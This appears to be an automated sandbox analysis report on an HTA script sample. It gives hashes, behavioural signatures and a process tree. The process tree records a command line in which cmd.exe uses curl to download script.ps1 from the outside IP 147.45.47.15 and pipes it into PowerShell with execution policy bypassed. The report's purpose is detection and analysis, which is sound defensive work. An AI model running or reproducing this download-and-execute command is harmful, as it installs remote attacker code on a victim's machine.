Analysis
- max time kernel: 120s
- max time network: 122s
- platform: windows7_x64
- resource: win7-20240903-en
- resource tags: arch:x64 arch:x86 image:win7-20240903-en locale:en-us os:windows7-x64 system
- submitted: 19-12-2024 07:07
Static task: static1
Behavioral task: behavioral1
- Sample: script.hta
- Resource: win7-20240903-en
- windows7-x64
- 4 signatures
- 150 seconds
General
- Target: script.hta
- Size: 551B
- MD5: 4041595b42e7b6e2ce5965cb76ea7da1
- SHA1: 401723ee1ac651ad359b89dd7e3cefea91d6aaa9
- SHA256: 054a6b8b84efa1127eca70abdba55e0f59fc96157504e5c9dcf0d6ff8386717f
- SHA512: 84cfba05772a5adfef0ddfe65bda07d8b908c16de04ea60942338c49a98db625801a986fd999740f61c62650b6e8ebb7f6056e76fe8656d09207f4cf9ffe7c19
Score: 3/10
Malware Config
Signatures
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).

- System Location Discovery: System Language Discovery (1 TTPs, 2 IoCs)
  Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

| description | ioc | Process |
| --- | --- | --- |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | mshta.exe |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe |

- Modifies Internet Explorer settings

| description | ioc | Process |
| --- | --- | --- |
| Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main | mshta.exe |

- Suspicious use of WriteProcessMemory (4 IoCs)

| description | pid | Process | procid_target |
| --- | --- | --- | --- |
| PID 2012 wrote to memory of 2404 | 2012 | mshta.exe | 30 |
| PID 2012 wrote to memory of 2404 | 2012 | mshta.exe | 30 |
| PID 2012 wrote to memory of 2404 | 2012 | mshta.exe | 30 |
| PID 2012 wrote to memory of 2404 | 2012 | mshta.exe | 30 |
Processes
- C:\Windows\SysWOW64\mshta.exe (depth 1, PID:2012)
  Command line: C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\script.hta"
  - System Location Discovery: System Language Discovery
  - Modifies Internet Explorer settings
  - Suspicious use of WriteProcessMemory
- C:\Windows\SysWOW64\cmd.exe (depth 2, PID:2404)
  Command line: "C:\Windows\System32\cmd.exe" /c curl -s http://147.45.47.15/script.ps1 | powershell -NoProfile -ExecutionPolicy Bypass -Command -
  - System Location Discovery: System Language Discovery